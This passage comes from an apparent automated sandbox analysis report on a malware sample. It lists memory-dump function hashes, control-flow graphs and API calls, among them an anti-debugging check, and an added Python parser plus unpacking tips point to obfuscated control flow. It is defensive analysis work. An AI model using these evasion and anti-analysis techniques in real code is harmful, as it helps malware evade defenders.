                                                                                                               • Call sites with more than one recorded target: 7983c87 -> 7983cba (this function's own entry address) and 7987850; 798543c -> 7987e3f, 7987e40, 7987dd0; 7986d95 -> 10b58d8, 10b57a0.
                                                                                                               • Blocks and successors (id: address range -> successor ids):
                                                                                                                 5593: 7983cba-7983cbd -> 5594, 5595
                                                                                                                 5594: 7983cbf-7983cd4 -> 5596, 5597
                                                                                                                 5595: 7983c83-7983c86 -> 6252, 6253
                                                                                                                 5596: 7983cec-7983d3a -> 5599, 5600
                                                                                                                 5597: 7983cd6-7983cea -> 5596
                                                                                                                 5598: 7983c8d-7983c94 -> (none)
                                                                                                                 5599: 7983d3c-7983d41 -> 5600, 5601
                                                                                                                 5600: 7983d43-7983d46 -> 5601
                                                                                                                 5601: 7983d4b-7983e48 -> 5613, 5614
                                                                                                                 5613: 7983e4e-7983f89 -> 5614
                                                                                                                 5614: 7983f91-7983f93 -> 5615, 5616
                                                                                                                 5615: 7983f9a-7983faa -> 5622, 5623
                                                                                                                 5616: 7983f95-7983f98 -> 5618
                                                                                                                 5618: 7983fd8-79853c4 -> 5881, 5882
                                                                                                                 5622: 7983fac-7983fbd -> 5618
                                                                                                                 5623: 7983fbf-7983fd5 -> 5618
                                                                                                                 5881: 7987078 -> 5883
                                                                                                                 5882: 79853ca-798543a -> 6249, 6250, 6251
                                                                                                                 5883: 798707d-7987096 -> (none)
                                                                                                                 5891: 7985442-7985658 -> 5916, 5917
                                                                                                                 5916: 798565e-798574b -> 5938
                                                                                                                 5917: 7985750-7985854 -> 5938
                                                                                                                 5938: 7985857-7986d72 -> 5883, 6210
                                                                                                                 6210: 7986d78-7986d93 -> 6254, 6255
                                                                                                                 6211: 7986d9a-7986ea9 -> 5883, 6223
                                                                                                                 6223: 7986eaf-7986eb4 -> 6224, 6225
                                                                                                                 6224: 7986ed3-7987007 -> 5883, 6245
                                                                                                                 6225: 7986eb6-7986ece -> 6226
                                                                                                                 6226: 7987042-7987077 -> (none)
                                                                                                                 6245: 7987009-798703c -> 6226
                                                                                                                 6249: 798543c (call 7987e3f) -> 5891
                                                                                                                 6250: 798543c (call 7987e40) -> 5891
                                                                                                                 6251: 798543c (call 7987dd0) -> 5891
                                                                                                                 6252: 7983c87 (call 7983cba) -> 5598
                                                                                                                 6253: 7983c87 (call 7987850) -> 5598
                                                                                                                 6254: 7986d95 (call 10b58d8) -> 6211
                                                                                                                 6255: 7986d95 (call 10b57a0) -> 6211
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1810753200.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_7980000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: F
                                                                                                              • API String ID: 0-1304234792
                                                                                                              • Opcode ID: 17dbd4b944b2611949fcfc1845753523d72a55a3243e57bc84250cb1fb97f3ef
                                                                                                              • Instruction ID: e98da0ba0fe67f8e865159d76fbe5294e0f529d79dd1d80fb82f2890dcb4dd6a
                                                                                                              • Opcode Fuzzy Hash: 17dbd4b944b2611949fcfc1845753523d72a55a3243e57bc84250cb1fb97f3ef
                                                                                                              • Instruction Fuzzy Hash: E3534E70A143148FCB54FFB8E88975DBBB2AF88300F5085E9D449A3355DA38AE98CF55
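The control-flow graphs for the functions at 901c280 and 7983cba are rendered in the report as a token stream: a block id followed by its address or address range, an optional "call <target>" on call blocks, and "id->id" edges. The parser below is an added example written for this page, not Joe Sandbox's code; the grammar it assumes is inferred from that text and is labelled as an assumption in the block. Its summary recovers what the drawing conveys visually: the single entry block, the blocks that never fall through, the block with the widest fan-out, the block most often returned to, and call sites the plugin resolved to more than one target. For 901c280 the resulting shape (one block re-entered from 11 others feeding a 15-way branch whose arms all lead back) is the shape control-flow flattening produces; that reading is the editor's, not a finding stated in the report.

```python
"""Parse the text form of a Joe Sandbox control-flow graph and summarise it.

Grammar ASSUMED from the report text (an editor's inference, not a documented
Joe Sandbox format):
  <id> <addr | addr-addr> [call <target>]   defines a basic block
  <id>-><id>                                 defines an edge between block ids
"""
from collections import defaultdict

# Input copied token-for-token from the control_flow_graph lines of the report
# entries for the functions at 901c280 and 7983cba (re-wrapped here).
CFG_901C280 = (
    "control_flow_graph 5463 901c280-901c2a5 5464 901c2a7 5463->5464 "
    "5465 901c2ac-901c2d0 5463->5465 5464->5465 5466 901c2d1 5465->5466 "
    "5467 901c2d8-901c2f4 5466->5467 5468 901c2f6 5467->5468 "
    "5469 901c2fd-901c2fe 5467->5469 5468->5466 5468->5469 "
    "5470 901c4c3-901c4f6 call 9015c10 5468->5470 5471 901c303-901c327 5468->5471 "
    "5472 901c523-901c52c 5468->5472 5473 901c329-901c33a 5468->5473 "
    "5474 901c42d 5468->5474 5475 901c350-901c358 5468->5475 "
    "5476 901c3f2-901c425 call 901a478 5468->5476 5477 901c515-901c51e 5468->5477 "
    "5478 901c456-901c459 5468->5478 5479 901c396-901c3ae 5468->5479 "
    "5480 901c478-901c490 5468->5480 5481 901c3da-901c3ed 5468->5481 "
    "5482 901c4fe-901c510 5468->5482 5469->5472 5470->5482 5471->5467 "
    "5501 901c35a-901c35c 5473->5501 5502 901c33c-901c34e 5473->5502 "
    "5486 901c436-901c451 5474->5486 5484 901c35f-901c36a 5475->5484 "
    "5476->5474 5477->5467 5488 901c462-901c473 5478->5488 "
    "5497 901c3c1-901c3c8 5479->5497 5498 901c3b0-901c3bf 5479->5498 "
    "5499 901c4a3-901c4aa 5480->5499 5500 901c492-901c4a1 5480->5500 "
    "5481->5467 5482->5467 5493 901c37d-901c384 5484->5493 "
    "5494 901c36c-901c37b 5484->5494 5486->5467 5488->5467 "
    "5496 901c38b-901c391 5493->5496 5494->5496 5496->5467 "
    "5504 901c3cf-901c3d5 5497->5504 5498->5504 5505 901c4b1-901c4be 5499->5505 "
    "5500->5505 5501->5484 5502->5467 5504->5467 5505->5467"
)

CFG_7983CBA = (
    "control_flow_graph 5593 7983cba-7983cbd 5594 7983cbf-7983cd4 5593->5594 "
    "5595 7983c83-7983c86 5593->5595 5596 7983cec-7983d3a 5594->5596 "
    "5597 7983cd6-7983cea 5594->5597 6252 7983c87 call 7983cba 5595->6252 "
    "6253 7983c87 call 7987850 5595->6253 5599 7983d3c-7983d41 5596->5599 "
    "5600 7983d43-7983d46 5596->5600 5597->5596 5598 7983c8d-7983c94 "
    "5599->5600 5601 7983d4b-7983e48 5599->5601 5600->5601 "
    "5613 7983e4e-7983f89 5601->5613 5614 7983f91-7983f93 5601->5614 5613->5614 "
    "5615 7983f9a-7983faa 5614->5615 5616 7983f95-7983f98 5614->5616 "
    "5622 7983fac-7983fbd 5615->5622 5623 7983fbf-7983fd5 5615->5623 "
    "5618 7983fd8-79853c4 5616->5618 5881 7987078 5618->5881 "
    "5882 79853ca-798543a 5618->5882 5622->5618 5623->5618 "
    "5883 798707d-7987096 5881->5883 6249 798543c call 7987e3f 5882->6249 "
    "6250 798543c call 7987e40 5882->6250 6251 798543c call 7987dd0 5882->6251 "
    "5891 7985442-7985658 5916 798565e-798574b 5891->5916 "
    "5917 7985750-7985854 5891->5917 5938 7985857-7986d72 5916->5938 5917->5938 "
    "5938->5883 6210 7986d78-7986d93 5938->6210 6254 7986d95 call 10b58d8 6210->6254 "
    "6255 7986d95 call 10b57a0 6210->6255 6211 7986d9a-7986ea9 6211->5883 "
    "6223 7986eaf-7986eb4 6211->6223 6224 7986ed3-7987007 6223->6224 "
    "6225 7986eb6-7986ece 6223->6225 6224->5883 6245 7987009-798703c 6224->6245 "
    "6226 7987042-7987077 6225->6226 6245->6226 6249->5891 6250->5891 6251->5891 "
    "6252->5598 6253->5598 6254->6211 6255->6211"
)


def parse_cfg(text):
    """Return (nodes, edges). nodes: id -> {"addr": str, "call": str | None}.

    The address token is always the one following a block id, so addresses
    that happen to be all digits (e.g. 7985442-7985658) are not mistaken
    for block ids.
    """
    tokens = text.split()
    if tokens and tokens[0] == "control_flow_graph":
        tokens = tokens[1:]
    nodes, edges, last = {}, [], None
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        if "->" in tok:                      # edge: src->dst
            src, dst = tok.split("->", 1)
            edges.append((src, dst))
            i += 1
        elif tok == "call":                  # call target belongs to the last block
            nodes[last]["call"] = tokens[i + 1]
            i += 2
        else:                                # block definition: id then address
            nodes[tok] = {"addr": tokens[i + 1], "call": None}
            last = tok
            i += 2
    return nodes, edges


def summarise(text):
    """Structural facts an analyst reads off the drawing, computed from the text."""
    nodes, edges = parse_cfg(text)
    out, inn = defaultdict(list), defaultdict(list)
    for src, dst in edges:
        out[src].append(dst)
        inn[dst].append(src)
    dispatcher = max(nodes, key=lambda n: len(out[n]))   # widest fan-out
    loop_head = max(nodes, key=lambda n: len(inn[n]))    # most re-entered
    calls = defaultdict(set)                             # call address -> targets
    for info in nodes.values():
        if info["call"]:
            calls[info["addr"]].add(info["call"])
    return {
        "blocks": len(nodes),
        "edges": len(edges),
        "entries": sorted(n for n in nodes if not inn[n]),
        "exits": sorted(n for n in nodes if not out[n]),
        "dispatcher": (dispatcher, len(out[dispatcher])),
        "loop_head": (loop_head, len(inn[loop_head])),
        "call_sites": {addr: sorted(t) for addr, t in calls.items()},
    }


if __name__ == "__main__":
    for name, cfg in (("901c280", CFG_901C280), ("7983cba", CFG_7983CBA)):
        print(name, summarise(cfg))
```

Call sites that resolve to several targets (7983c87, 798543c, 7986d95 in the second graph) are the places to set breakpoints when unpacking, since the target chosen at run time depends on decrypted state the static listing cannot show.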
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1811136870.0000000009010000.00000040.00000800.00020000.00000000.sdmp, Offset: 09010000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_9010000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 6f$6f$$q
                                                                                                              • API String ID: 0-2870187524
                                                                                                              • Opcode ID: 260804410afc4d44132225d5f5daf8d3246f8887c5f6f25c9650860b93211faa
                                                                                                              • Instruction ID: dc3d70b10aadb7b4aafdab4d85e93185380e546c6891333221e5b2ff02ba9e51
                                                                                                              • Opcode Fuzzy Hash: 260804410afc4d44132225d5f5daf8d3246f8887c5f6f25c9650860b93211faa
                                                                                                              • Instruction Fuzzy Hash: A471D0B4E00218DFDB54CFA5D5855EEBBB2FF89301F20942AE80AAB364DB345981CF51
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1810511109.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_7800000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: (q$PHq
                                                                                                              • API String ID: 0-3639488057
                                                                                                              • Opcode ID: e8164df042b5071cb1d9d2402e44bb1422c5ab2e5b4a078619e7e283496d22d5
                                                                                                              • Instruction ID: 1c25c5b836cd099f4b76ee0c314fc626b138e3b98f59c2061a626e0a7c3db10e
                                                                                                              • Opcode Fuzzy Hash: e8164df042b5071cb1d9d2402e44bb1422c5ab2e5b4a078619e7e283496d22d5
                                                                                                              • Instruction Fuzzy Hash: 86F15C74A002058FDB64DF68C859BADBBF2BF89320F14C569D516EB3A1CB34A845CB91
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1810087104.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_76d0000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: k@
                                                                                                              • API String ID: 0-1332332647
                                                                                                              • Opcode ID: 12c914c88252b24515506ce2d7d808ec7a3da1d0c41c059ad0c94794d00a481d
                                                                                                              • Instruction ID: 794aad68030400704b5cc0ea91317f5a3486296f6e84c7282d77bff1d1bf7ee5
                                                                                                              • Opcode Fuzzy Hash: 12c914c88252b24515506ce2d7d808ec7a3da1d0c41c059ad0c94794d00a481d
                                                                                                              • Instruction Fuzzy Hash: C2D2F271E153048FC705FBB8D89876DBFB2AF89300F4545AAD486E73A5DA389C48CB61
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1810753200.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_7980000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Teq$Teq
                                                                                                              • API String ID: 0-2938103587
                                                                                                              • Opcode ID: 459423273eb13a453701fd066abaf2345be540bc82c2eecdf2ff274909f3102a
                                                                                                              • Instruction ID: 9b34c99e3cbbd982debdffc69341dd03762751fa39296a72058dbd0d2553cbbf
                                                                                                              • Opcode Fuzzy Hash: 459423273eb13a453701fd066abaf2345be540bc82c2eecdf2ff274909f3102a
                                                                                                              • Instruction Fuzzy Hash: 9C9103B5E052098FDB44CFAAC884ADEBBB2BF89310F14942AD419BB368D7749945CF50
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1810753200.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_7980000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Teq$Teq
                                                                                                              • API String ID: 0-2938103587
                                                                                                              • Opcode ID: 889bfc7a8cb14071923da62362576990a1a89c98632232f20471f2c349a048d3
                                                                                                              • Instruction ID: 22997789d7ed8923727211983eb6d29569d531f7ef224e376b9a7ded02f4e633
                                                                                                              • Opcode Fuzzy Hash: 889bfc7a8cb14071923da62362576990a1a89c98632232f20471f2c349a048d3
                                                                                                              • Instruction Fuzzy Hash: 8391F2B4E002099FDB48DFAAC880A9EFBB2FF89310F14942AD419BB358D77499458F50
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1811136870.0000000009010000.00000040.00000800.00020000.00000000.sdmp, Offset: 09010000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_9010000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 6f$$q
                                                                                                              • API String ID: 0-559323919
                                                                                                              • Opcode ID: 6958b8b7ab6891440dec6d871cb4d644ab376f4def3991e02c743864b84a3917
                                                                                                              • Instruction ID: fb38a504f30607bc8cf50b270806a5473fb24a8c9109036ea8d6ad5ff69d7e14
                                                                                                              • Opcode Fuzzy Hash: 6958b8b7ab6891440dec6d871cb4d644ab376f4def3991e02c743864b84a3917
                                                                                                              • Instruction Fuzzy Hash: BD71D274E00218DFDB54CFA5D4956EEBBB2FF89301F20942AE80AAB364DB345985CF51
                                                                                                              APIs
                                                                                                              • CreateProcessAsUserW.KERNELBASE(?,?,?,0000000A,?,?,?,?,?,?,?), ref: 0901BD23
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1811136870.0000000009010000.00000040.00000800.00020000.00000000.sdmp, Offset: 09010000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_9010000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateProcessUser
                                                                                                              • String ID:
                                                                                                              • API String ID: 2217836671-0
                                                                                                              • Opcode ID: c2f86baf16fa796941a32dfe1644b31cad2fef0034492602ebfed6c0ee1d2e30
                                                                                                              • Instruction ID: 5182e4b6662dc1dadf35a3110c863a4ec17daa17cbc089c376296787838345b0
                                                                                                              • Opcode Fuzzy Hash: c2f86baf16fa796941a32dfe1644b31cad2fef0034492602ebfed6c0ee1d2e30
                                                                                                              • Instruction Fuzzy Hash: 2051D3B1D002699FDB24CF99C840BDDBBF5BF48310F0484AAE909B7254DB759A85CF90
                                                                                                              APIs
                                                                                                              • CheckRemoteDebuggerPresent.KERNELBASE(00000000,?), ref: 0500F35F
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1806590670.0000000005000000.00000040.00000800.00020000.00000000.sdmp, Offset: 05000000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_5000000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CheckDebuggerPresentRemote
                                                                                                              • String ID:
                                                                                                              • API String ID: 3662101638-0
                                                                                                              • Opcode ID: 9abc19104f44daa1afe35f0427ddbcce6c8bd4e306f136c5821809e9c408e007
                                                                                                              • Instruction ID: 7bf82bc8c5da2104c71c98241370f08a4976f81b39df2fca11a975ad7e1db42a
                                                                                                              • Opcode Fuzzy Hash: 9abc19104f44daa1afe35f0427ddbcce6c8bd4e306f136c5821809e9c408e007
                                                                                                              • Instruction Fuzzy Hash: 2A2136B2C012599FDB24CF9AD484BEEBBF4BF48320F14841AE855A7280D778A944CF65
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1810753200.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_7980000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: kQD
                                                                                                              • API String ID: 0-3066535408
                                                                                                              • Opcode ID: 770cd1ce2242af77775dd3f433055ec9071fa1c611aadc77cd8e7ed4a81df16e
                                                                                                              • Instruction ID: e166ae4efdc808dece02c8d18fb4e5be2a7cc16a27c4a1180dbd50d4fdf7474b
                                                                                                              • Opcode Fuzzy Hash: 770cd1ce2242af77775dd3f433055ec9071fa1c611aadc77cd8e7ed4a81df16e
                                                                                                              • Instruction Fuzzy Hash: 79C128B4D1021ADFCB44DF95C5848AEFBB2FF8A300F64A559C816BB214D734A982CF94
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1810753200.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_7980000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: f8a901f631f3df0b413191e3742f3f54ad057c604ce387fd35fed224c5f472e1
                                                                                                              • Instruction ID: 75c187cd481d34965f22d61d309299f4e797674345f67dd075d417d6a16de0e5
                                                                                                              • Opcode Fuzzy Hash: f8a901f631f3df0b413191e3742f3f54ad057c604ce387fd35fed224c5f472e1
                                                                                                              • Instruction Fuzzy Hash: 6CC29471A143188BC745FBB8E8897ADBBB2FF48300F4485A9D449A3394DE38ED58CB51
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1810753200.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_7980000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: >NG
                                                                                                              • API String ID: 0-1926143806
                                                                                                              • Opcode ID: 247029896fbbd961de256d767cd481002c9e74690a8fb957d8510c6cd5a8cbbd
                                                                                                              • Instruction ID: 76b1ee203ddd107c4784cad42c964744772fb98ee7cede2c964ad3d249bbc556
                                                                                                              • Opcode Fuzzy Hash: 247029896fbbd961de256d767cd481002c9e74690a8fb957d8510c6cd5a8cbbd
                                                                                                              • Instruction Fuzzy Hash: 68516AB0E14219CFDB48CFA9C5906AEFBF2BF8A304F24C42AD419B7254D7748A418F64
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1810753200.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_7980000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: <
                                                                                                              • API String ID: 0-4251816714
                                                                                                              • Opcode ID: b9475006230aa2fa24fec2e500d8b1b7d86659f6fe0310ba617cefb079382bbf
                                                                                                              • Instruction ID: b686533809f876fdcae0fb937f5f7d0c6efe771b272cf0bac08e916f0d992389
                                                                                                              • Opcode Fuzzy Hash: b9475006230aa2fa24fec2e500d8b1b7d86659f6fe0310ba617cefb079382bbf
                                                                                                              • Instruction Fuzzy Hash: 0A5175B1E01658CFDB59DFAAC9446DDBBF2AF89304F14C0AAD409AB264DB345A85CF00
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1810511109.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_7800000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 519bfd370b87a1c15b8ce87f3f84354663ece458e6baea94f0f29d3e58d0ccc8
                                                                                                              • Instruction ID: 871a023d35e293cdf19f2a74a4ce173f876cf3e3f54b36c6de685ef716c8078f
                                                                                                              • Opcode Fuzzy Hash: 519bfd370b87a1c15b8ce87f3f84354663ece458e6baea94f0f29d3e58d0ccc8
                                                                                                              • Instruction Fuzzy Hash: DE524E34A003458FDB14DF68C844B99B7F2BF86314F2582A9D5586F3A2DB71AD86CF81
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1810511109.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_7800000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 10793a6a66e3c1db416cb6b1e22c09e7df03ac48fa8c0611dfbc85e9c7f373b1
                                                                                                              • Instruction ID: a3b2b1c58aefbbe1d1a2fb0cfaac43c50b51a3726a5e504312228d2ef1bbac8d
                                                                                                              • Opcode Fuzzy Hash: 10793a6a66e3c1db416cb6b1e22c09e7df03ac48fa8c0611dfbc85e9c7f373b1
                                                                                                              • Instruction Fuzzy Hash: FE525E34A00345CFDB14DF68C844B99B7F2BF86314F2582A9D5586F3A2DB71A986CF81
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1811136870.0000000009010000.00000040.00000800.00020000.00000000.sdmp, Offset: 09010000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_9010000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: edaab89718c8323bf04136256808eea70f8ecbb6cff9355746bc31dc752c97af
                                                                                                              • Instruction ID: 4d2fcb2a9cb8a6a18575869d363399a4a97103a96b290ffbfe1ca600dc7daa34
                                                                                                              • Opcode Fuzzy Hash: edaab89718c8323bf04136256808eea70f8ecbb6cff9355746bc31dc752c97af
                                                                                                              • Instruction Fuzzy Hash: 15F10774A0566A8FDB64CF69C98479DBBB6BF88340F10D9EAD40EA7214D7709EC18F40
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1811136870.0000000009010000.00000040.00000800.00020000.00000000.sdmp, Offset: 09010000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_9010000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 310761ee4b8073f6279f6569d3f5308deca00e87804c31e4891e485d9b0f7b65
                                                                                                              • Instruction ID: 2abafeb9c569e4635cdced12ede62ead365f34a7211b4f6eb82b4e33d00820ac
                                                                                                              • Opcode Fuzzy Hash: 310761ee4b8073f6279f6569d3f5308deca00e87804c31e4891e485d9b0f7b65
                                                                                                              • Instruction Fuzzy Hash: 5C6102B0E00219DFCB44CFE4D9456AEBBB2FF49341F54D82AE812A7250D7789A41CF95
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1810753200.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_7980000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: c30ba93bc20fe8681addd855b5a99dc7221d982482267e8a5c1eb591e61e779d
                                                                                                              • Instruction ID: ab6d348f3262dac3aaf8d757e30d58a21320a886d3e3ad45e6fd1e45e31c4e41
                                                                                                              • Opcode Fuzzy Hash: c30ba93bc20fe8681addd855b5a99dc7221d982482267e8a5c1eb591e61e779d
                                                                                                              • Instruction Fuzzy Hash: 83310CB1E006198FEB58DF6ADC5079EBBF7AFC9210F14C1AAC408A7254DB345A85CF61
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1811136870.0000000009010000.00000040.00000800.00020000.00000000.sdmp, Offset: 09010000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_9010000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: db57af6cfe6c1c5c99e8f828b3f35f3a3e0336d2db790c7673f8f888dda41968
                                                                                                              • Instruction ID: 00a18b98b8e46552ae5d03b5566c217e5352da69db266df2493919c34d9841ac
                                                                                                              • Opcode Fuzzy Hash: db57af6cfe6c1c5c99e8f828b3f35f3a3e0336d2db790c7673f8f888dda41968
                                                                                                              • Instruction Fuzzy Hash: 0621B971E056189BEB58CF6BD84069EF7F7AFC8200F04C5BAD908A6264EB341A468F51

                                                                                                              Control-flow Graph

                                                                                                              control_flow_graph 0 10bdacb-10bdad1 1 10bdad3 0->1 2 10bdad4-10be815 0->2 1->2 261 10be820-10be84a call 10bd6a8 2->261 263 10be84f-10be869 call 10bd6a8 261->263
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1797283892.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_10b0000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q
                                                                                                              • API String ID: 0-1174384227
                                                                                                              • Opcode ID: a2a5ff2646718686832589968e791593f11581cb1d5190475fb855d8881a5c2c
                                                                                                              • Instruction ID: f28f063fa754b1041b80242f121db85b6e1b2ebbe65a37e17f009bbf888860cf
                                                                                                              • Opcode Fuzzy Hash: a2a5ff2646718686832589968e791593f11581cb1d5190475fb855d8881a5c2c
                                                                                                              • Instruction Fuzzy Hash: 27721B34A0221AAFCB18EF75E9526ED7BF1FB44304F1086A8D04ABF255DB306E858F55

                                                                                                              Control-flow Graph

                                                                                                              control_flow_graph 266 10bdad8-10be84a call 10bd6a8 526 10be84f-10be869 call 10bd6a8 266->526
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1797283892.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_10b0000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q
                                                                                                              • API String ID: 0-1174384227
